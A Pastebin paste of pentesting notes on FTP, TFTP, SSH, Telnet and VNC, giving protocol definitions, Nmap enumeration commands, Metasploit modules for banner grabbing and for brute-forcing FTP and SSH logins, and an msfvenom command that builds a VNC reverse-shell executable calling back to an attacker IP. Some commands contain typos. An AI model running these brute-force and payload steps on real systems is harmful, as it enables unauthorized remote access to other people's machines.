Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- PROTOCOLS - DEFINITION, ENUMERATION AND VAPT HIERARCHY
- =======================================================
- 1. FTP
- =======
- FTP is an acronym that stands for File Transfer Protocol. An FTP client is a program that allows you to easily move files from one computer to another.
- An FTP server listens on TCP port 21 for incoming connection requests from FTP clients. The server uses this port to control the connection and opens a separate port for transferring file data.
- FTP supports two modes of data transfer: plain text (ASCII), and binary. You set the mode in the FTP client. A common error when using FTP is attempting to transfer a binary file (such as a program or music file) while in text mode, causing the transferred file to be unusable.
- Enumeration via Nmap
- > nmap -Pn -sS -A -p21 TargetIP
- Attacks on FTP
- > Banner Grabbing : Reconaissance technique used to gain information about a computer system on a network and the services running on its open ports.
- MSF > use auxiliary/scanner/ftp/ftp_version
- > set rhosts
- > exploit
- > Brute Forcing : Brute forcing is a trial and error method used by application programs to decode encrypted data such as passwords by hit and trial through exhaustive effort by employing intellectual strategies.
- MSF > use auxiliary/scanner/ftp/ftp_login
- > set rhosts
- > set user_file rockyou.txt
- > set pass_file rockyou.txt
- > set stop_on_success true
- > exploit
- 2. TFTP
- =======
- TFTP stands for Trivial File Transfer Protocol. It's a technology for transferring files between network devices and is a simplified version of File Transfer Protocol.
- Today, TFTP usually found on routers as consumer broadband routers and commercial network routers.
- TFTP can also be used to remotely start a computer and back up network or router configuration files.
- TFTP relies on UDP for transporting data with UDP port number 69.
- Diff between TFTP and FTP
- - Unlike FTP, TFTP has no login feature, so it doesn't prompt for a username and password. Avoid using TFTP to share sensitive files — you can't protect them or audit their access.
- - Listing, renaming, and deleting files over TFTP is usually not allowed.
- Enumeration via nmap
- > nmap -Pn -sU -p69 --script tftp-enum TargetIP
- sftp = ftp+sshv2.0
- 3. SSH
- ======
- SSH stands for "Secure Shell". SSH uses port 22 to connect your computer to another computer on the internet. Network administrators will use this technique so they can remote login / remote control a business server in some other part of the city.
- Examples of using SSH:
- - Your email administrator needs to reboot the company email server from his home.
- - Your network administrator needs to reset your office password while she is sitting in a different office or is away on a conference.
- In short, Secure Socket Shell is a network protocol that gives users, particularly system administrators, a secure way to access a computer over an unsecured network.
- - apt-get install openssh-server
- -
- Enumeration using Nmap
- > nmap -Pn -sU -p22 -A TargetIP
- Attacks on SSH
- > Banner Grabbing
- MSF > use/auxiliary/scanner/ssh/ssh_version
- > set rhosts
- > set rport
- > exploit
- > Brute Forcing on ssh login
- MSF > use/auxiliary/scanner/ssh/ssh_login
- > set rhosts
- > set rport
- > set userpass_file
- > exploit
- 4. TELNET
- ==========
- Telnet refers to a network virtual terminal protocol. The acronym comes from "teletype network," "terminal network," or "telecommunications network," depending on which source you believe, and it was built to be a form of remote control to manage mainframe computers from distant terminals.
- In time, insecure Telnet evolved into a newer network protocol called Secure Socket Shell (SSH), which modern network administrators use to manage Linux and Unix computers from a distance. SSH provides strong authentication and secure encrypted data communications between computers over an insecure network.
- Enumeration using Nmap
- > nmap -sSV -p23 TargetIP
- Main disadvantage of using Telnet : It sends user credentials into plain text.
- 5. VNC
- =======
- VNC (Virtual Network Computing) is a technology for remote desktop sharing, a form of remote access on computer networks. VNC enables the visual desktop display of one computer to be remotely viewed and controlled over a network connection.
- Remote desktop technology like VNC is useful on home computer networks, allowing someone to access their desktops from another part of the house or while traveling. It is also useful for network administrators in business environments, such as Information Technology (IT) departments who need to remotely troubleshoot employees' systems.
- Attacking Methods
- ==================
- msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.1.216 lport=44455 -f exe > vnc.exe
- --
- use exploitmulti/handler
- msf exploit(handler) > set payload windows/vncinject/reverse_tcp
- msf exploit(handler) > set lhost
- msf exploit(handler) > set lport
- msf exploit(handler) > set viewonly false
- msf exploit(handler) > run
- --------------------
- SMB ETERNAL BIBLE - https://lucideustech.blogspot.com/2017/12/the-eternal-exploitation-bible-lucideus.html
Add Comment
Please, Sign In to add comment